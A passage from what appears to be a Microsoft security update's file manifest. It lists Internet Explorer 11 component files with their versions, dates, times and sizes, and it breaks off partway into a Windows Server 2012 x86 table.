5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:22| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 4:46| 427,520 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 17:52| 292,864 \ninstall.ins| Not versioned| 12-Feb-2021| 16:24| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:35| 548,864 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 107,008 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 19:34| 23,552 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:02| 62,464 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.17416| 30-Oct-2014| 19:52| 495,616 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 726,016 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 39,936 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 364,032 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 17:58| 221,696 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:50| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:20| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:17| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 175,616 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 17:44| 10,948,608 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:05| 263,680 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,186,304 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 17:51| 587,264 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:51| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:43| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:34| 43,520 \nmsfeedssync.exe| 11.0.9600.16384| 21-Aug-2013| 20:05| 11,776 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 73,216 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 17:44| 16,229,376 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 1:36| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:39| 3,228 \nIEAdvpack.dll| 11.0.9600.16384| 21-Aug-2013| 19:54| 98,816 \nieetwcollector.exe| 11.0.9600.18658| 5-Apr-2017| 10:29| 98,816 \nieetwproxystub.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 43,008 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 1:36| 4,096 \nielowutil.exe| 11.0.9600.17031| 22-Feb-2014| 1:32| 222,208 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 308,224 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:11| 268,800 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 34,816 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.16518| 6-Feb-2014| 1:12| 112,128 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 12-Feb-2021| 18:53| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 457,216 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 574,976 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 1,935,360 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:22| 60,928 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,105,408 \noccache.dll| 11.0.9600.19867| 12-Oct-2020| 21:01| 121,856 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \nwebcheck.dll| 11.0.9600.19867| 12-Oct-2020| 20:57| 201,216 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \npdm.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 420,752 \nmsdbg2.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 295,320 \npdmproxy100.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 76,712 \nmsrating.dll| 11.0.9600.17905| 15-Jun-2015| 12:46| 157,184 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,186,240 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 17:52| 678,400 \niernonce.dll| 11.0.9600.16518| 6-Feb-2014| 1:15| 28,160 \niesetup.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 59,904 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:46| 16,303 \ninseng.dll| 11.0.9600.16384| 21-Aug-2013| 19:35| 77,312 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:28| 87,552 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:02| 155,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 130,048 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:09| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 734,720 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 19:49| 236,032 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:03| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:31| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:48| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:50| 1,890,304 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 17:34| 12,315,648 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:38| 24,486 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 18:45| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:24| 1,678,023 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 17:54| 675,328 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 20:15| 84,480 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 3,573,248 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 557,568 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:12| 516,608 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:17| 403,968 \n \n### **Windows Server 2012**\n\n## \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time** \n---|---|---|---|--- \nUrlmon.dll| 11.0.9600.19963| 1,343,488| 13-Feb-21| 1:50 \nIexplore.exe| 11.0.9600.19963| 810,400| 14-Feb-21| 0:24 \nWininet.dll.mui| 11.0.9600.19963| 46,592| 14-Feb-21| 0:26 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:27 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:27 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:28 \nWininet.dll.mui| 11.0.9600.19963| 56,320| 14-Feb-21| 0:29 \nWininet.dll.mui| 11.0.9600.19963| 57,856| 14-Feb-21| 0:30 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:31 \nWininet.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:32 \nWininet.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:32 \nWininet.dll.mui| 11.0.9600.19963| 55,296| 14-Feb-21| 0:33 \nWininet.dll.mui| 11.0.9600.19963| 45,056| 14-Feb-21| 0:34 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:35 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:36 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 0:36 \nWininet.dll.mui| 11.0.9600.19963| 39,424| 14-Feb-21| 0:38 \nWininet.dll.mui| 11.0.9600.19963| 35,840| 14-Feb-21| 0:38 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:39 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:40 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:41 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:42 \nWininet.dll.mui| 11.0.9600.19963| 53,760| 14-Feb-21| 0:42 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:44 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:44 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:45 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:46 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 0:47 \nWininet.dll.mui| 11.0.9600.19963| 